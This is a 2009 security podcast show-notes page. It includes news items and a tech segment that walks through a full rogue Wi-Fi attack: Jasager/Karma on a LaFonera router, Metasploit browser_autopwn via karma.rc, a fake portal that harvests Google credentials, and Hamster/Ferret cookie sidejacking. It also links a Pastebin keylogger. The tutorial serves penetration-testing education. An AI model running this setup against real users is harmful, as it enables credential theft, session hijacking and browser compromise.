Episode173

From Paul's Security Weekly
Jump to: navigation, search


Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Shameless Plugs & General Announcements

Security Weekly - Episode 173 - For Thursday October 29th, 2009

  • We are growing mustaches for Movember! Goto http://securityweekly.com/mo for more information and to make donations to our team that will benefit cancer research.
  • Syngress Publishing - Quench your thirst for knowledge at syngress.com and use the referral link or the discount code "Security Weekly" at checkout to save 20% on all security book titles!
  • Defensive Intuition - We are also sponsored by Defensive Intuition. Defensive Intuition is the provider of many security consulting services: penetration testing, physical assessments, and social engineering. Defensive Intuition: Owning your boxes, 7 ways to Sunday!
  • Phreaknic 13 - Get your Phreak on! Oct. 30-31st in Nashville, TN! Billy Hoffman among others presenting...
  • 10 PRINT "GOTO DOJOCON November 6-7
  • GOTO 10
  • Hackfest Canada! - Mick will be speaking/ranting from the Great White North! November 7th, you'll want to be there! Quebec, Canada (This con is so cool it's happening in two languages!)
  • Community SANS: Sec 542 Web Application Penetration Testing - SANS is pleased to announce Community SANS Providence, running January 11 - 16. Larry will teach Security 542: Web Application Penetration Testing and Ethical Hacking. The course will be hosted by Brown University. Also coming up, 617 on Calgary sometime in March!

Episode Media

mp3 pt 1

mp3 pt 2

Interview: Anthony Jacobin and BarCrawl

About

Anthony Jacobin

Home schooled from the 6th grade thru high school, Anthony graduated from Community College at the tender age of 16 (yes, graduated). He then went to college and finished his degree with stints in France and Sweden.

Pastebin and Bar Crawl

As we've all heard about the hotmail password leak on pastebin. The actual uses for pastebin are being blurred. It's intended for collaborative code debugging. But as we have seen, pastebin is being used for some weird stuff. My friends over at http://www.pastebinfail.com are documenting some of the weird, funny and odd posts. Some of these posts can be useful to us in the security field. One example of this is the exploit category over at pastebinfail, http://www.pastebinfail.com/search/label/exploit. 0-days and private exploits can be reversed to prevent use in the wild and create patches. As pen-testers, without good tools our hands get a bit stressed, how about a nice little keylogger? http://www.pastebinfail.com/2009/09/nice-little-keylogger.html. I haven't complied and played with this yet, what are the chances of this thing getting passed signature based AV? And we can all use a laugh right, base64 decode this and pop into a png ... bam ... you got a an owl! http://www.pastebinfail.com/2009/07/base64-encode-png-of-owl.html

Pastebin doesn't last forever, or else the site search would be used a lot more. I'm working on a crawler so that you can archive various posts of interests and check them out on your own time. One objective is to not piss off Paul Dixon ( the owner of Pastebin ) so my goal is to only use the same amount of bandwidth that you would from trolling the recent posts. My crawler isn't that far off from being released, but when it is, it will be released as BarCrawl @ http://www.hackingeurope.com my site and security + random blog.

Questions

Tech Segment: Pwnage with the LaFonera Pt II

In part one we talked about setting up the LaFonera with Jaseger, but now lets use it!

First off, lets do a little security on our LaFonera. While attached to the same LAN, and assuming our LaFonera is on 192.168.1.1, first telnet to the device. It will let you in without a password, and we need to set one:

passwd

Once complete, telnet will be disabled and only web and SSH will be available. Now we need to SSH back to the device:

ssh root@192.168.1.1

Now, in addition, the web interface for Jaseger will now require a username and password - for root, and the password you just defined. Good, now we can feel a little more safe.

Now to tune our Jaseger install. By default, the pawnages doesn't start by default, and requires some clicks in a web interface after logging in. This can be an issue if we hide this device and power dies and is reapplied. We'll use the build in uci command in OpenWRT to set wireless to come up on startup:

root@OpenWrt:/# uci set wireless.wifi0.disabled=0
root@OpenWrt:/# uci commit wireless && wifi

By default, Jaeger stands up a wireless network to bait people with in addition to the karma functionality. By default the wireless network is labeled "OpenWRT", but we can do better for baiting wireless clients. Let'c change it by editing /etc/config/wireless on the LaFonera. Change the following line to reflect the SSId of our choosing:

option ssid    FreeWireless

Let's also make sure that Karma pawnage starts on power on as well. In order to do that, we need to create a startup script, /etc/init.d/jaseger with the following contents:

wlanconfig ath0 create wlandev wifi0 wlanmode master
iwpriv ath0 karma 1

in addition, if you are using this in an environment with know good wireless networks that you don't want to Karma (such as corporate networks, or your home network), you can add those networks to avoid to the startup file as well:

iwpriv ath0 addkarmassid "myhomenet"

Don't forget to make the startup script executable:

chmod +x /etc/init.d/jaseger

In order to further some of the later attacks, we want to define some DHCP options on the La Fonera so that when users get Karama'ed, and obtain an IP address from our router, we'll direct DNS and all of the traffic to a laptop attached to our LaFonera (we'll set this up momentarily). In order to make these changes add the following to the LAN section of /etc/config/dhcp.conf:

option 'dhcp_option' 'lan,3,192.168.1.2'
option 'dhcp_option' 'lan,6,192.168.1.2'

This assumes that the laptop that we set up has an IP address of 192.168.1.2

metasplot

Remember that laptop we talked about? Let's get it configured. I'm using Ubuntu 9.04 for this one, so that is what it will reflect. First we need to install a few dependencies for Metasploit:

sudo apt-get install sqlite3 libsqlite-dev libsqlite3-ruby subversion

Now we can install Metasploit, but we'll use the version from SVN:

svn checkout http://metasploit.com/svn/framework3/trunk/ ~/msf

We also need the Karma startup file for metasploit, which we need to place in the ~/msf directory:

cd ~/msf
wget http://metasploit.com/users/hdm/tools/karma.rc

In addition, for this to work we need to update the karma.rc file. The beginning of the karma.rc file should look like this:

db_driver sqlite3
db_create /tmp/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 192.168.1.2
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 192.168.1.2
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

This updates the karma.rc to point to our metasploit installation on 192.168.1.2, as well as updating commands for the loading of sqlite.

On a final note, when folks get pwned by our Karma and metasploit installation, when they browse the web, metasploit provide a nice web page to the user. It isn't very convincing, so we can replace it with a new page:

cd ~/msfdata/exploits/capture/http
mv index.html index.html.old
wget http://pastebin.com/f178811cd

Alternatively, we could even modify the new one with some additional evil. One we like at Security Weekly is to allege that the portal is tied to their Google credentials to gain access. By providing a username and password field, we can also obtain google credentials without any other heavy lifting.

With our LaFonera tied to our metasploit box let's make sure that we have our IP address set on the Ubuntu installation:

sudo ifconfig eth0 inet 192.168.1.2


Now, lets fire off our Metasploit instance for ownage. Once done, Jaseger will answer for all wireless requests, and assign an IP address, DNS and Router (of out metasploit laptop), and pass all requests to us on the laptop, and using browser autopwn to force acquisition of cookies:

sudo ./msfconsole -r karma.rc

When ownage had occurred, we can view the results in the Metasploit console with:

db_notes

Sidejack

while we are at it, let's grab eve more credentials and be able to use them for sessions. This is useful for obtaining credentials fir apps that Metasploit's browser_autopwn doesn't know about, such as internal resources while engaged in a pentest.

We can use an awesome pair of tools on our Ubuntu box the intercepts requests for http traffic, capture cookies, and set up a local proxy so tht we can clone the session.

First we need to do the install via a download and compile:

sudo apt-get install libpcap-dev build-essential
wget http://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z
tar xzf hamster-2.0.0.tar.z
cd ~/hamster/build/gcc4
make
cd ~/ferret/build/gcc4
make

We do need to do a bit of post compilation configuration so that all the bits and pieces are in the correct place:

cp ~/ferret/bin/ferret ~/hamster/bin/

In another terminal, we need to start Hamster:

cd ~/hamster/bin/
sudo ./hamster

Now, fire up Firefox urn your Ubuntu box, and define an HTTP proxy (Preferences | Advanced | Network | Settings) at 127.0.0.1 on port 1234. Once added, point your browser to 127.0.0.1:1234. In the hamster web interface, click Adapters, and tell it about the interface that is receiving our requests from victims, usually eth0. Once Hamster is being populated, if you added the proxy, you should be able to clone user sessions from the captured credentials.

This will of course require our network to have some sort of valid uplink to the internet, or the corporate network in which we are testing. We'd need another ethernet interface on our laptop to connect, or a Cell connection for the internet. I'll leave setting up these additional connections as an exercise for the reader, but setting up my cell connection urn Ubuntu was painless with help from a quick google search.

A command of advice, you will need to allow IP forwarding through your Ubuntu box with:

echo 1 > /proc/sys/net/ipv4/ip_forward

I have to give huge thanks to Ax0n from HiR for his series of posts on Jaseger install integration, on which this segment was based.


Stories For Discussion

  1. Why should you let users browse the Internet? - This is one concept that makes even the best and brightest defenders in our field crumble and hide in shame. why on earth would you let all of the client systems, who have access to the most sensitive data in the organization, access the entire internet? of course, there must be a clear cut, business related reason to allow this activity to occur, right? if you dig deep down, i bet there isn't such as reason in a good number of our organizations. i truly believe we need to re-think how we do client security, and access to the internet is a big factor. if i look at the cost of monitoring internet traffic, including the devices and processes involved, time of human resources to deal with the fallout, constant reporting to management of web browsing, wasted employee time on non-work related sites, is it all worth it? when you can buy a computer for $150, why not create two networks, one with internet access and one without? of course this wouldn't work for all organziations, but it is in use by the government with great success, right? okay, maybe the joint strike fighter plans is an example of this not working, but no defensive measure is perfect.
  2. Former anti-virus researcher turns tables on industry - [Paul] - This story is just crazy! We had Peter on the show on episode 155, when he was working for an anti-virus company. Now, the tables have been turned and he created a site called A/V Tracker, http://avtracker.info/ which lists the services and sites that people are uploading malware too, including IP addresses. Peter says that its easy for Malware to figure out that its being scanned by one of these services and self-destruct, or even better/worse, pwn the system its being analyzed on (I'm certain they have protections against this, but as we all know, protections can be defeated.).
  3. Social Engineering in Real-World Computer Attacks - [Paul] - This is a great article by Lenny Zeltzer which covers the ways in which you can use social engineering to hack stuff. For example, parking tickets left on people's cars that tell them to visit a web site, VoIP accounts used to ask people to call their banks, and malware infecting USB keys. The last one is perticularly intresting, as you have a virtual threat that manages to manifest itself into the real world (Like the matrix or the opposite of Tron ;) I think we will see more of these attacks, as attacks that use real-world elements are often more successful.
  4. Bejtlich's Book Reviews - Richard is recommending two books on web application security, SQL Injection Attacks and Defense and The Web Application Hacker's Handbook Posted Go read them :)
  5. Don't Be The Smelly Kid - [Paul] - This is a great analogy by Bugbear, security is like good hygiene, you have to keep up with it, so don't be the smelly kid. And don't think you'r getting away with covering up your stench with cologne, because you still smell, so take a real shower, and do it on a regular basis. Go to the doctor too, thats kinda like a penetration test, wait, did I just go there?
  6. One For The N00bs - [Paul] - In so many ways, high school sucks. There are all these rules, and kids in high school are all about crowds and who you hand with and sit with at the cafeteria. Kinda like security scene, some only let certain folks to the table. Well, like dave and others, our table is open to anyone, unless of course you smell, in which case you can shower and come back when you don't smell. But my point it, I won't go to the prom with you. No, really, the point it don't be a dick and not teach people stuff because they are a n00b.
  7. Louisville Infosec Vidoes Are Up - [Paul] - See me and John Strand present (seprately). We're okay I guess :)
  8. Random Password Generator - [Paul] - Pretty neat command to generate random password, which I highly recommend. Also, check out Hal's write-up on the command line kung fu blog. He really does have way too much time on his hands!

Other Stories Of Interest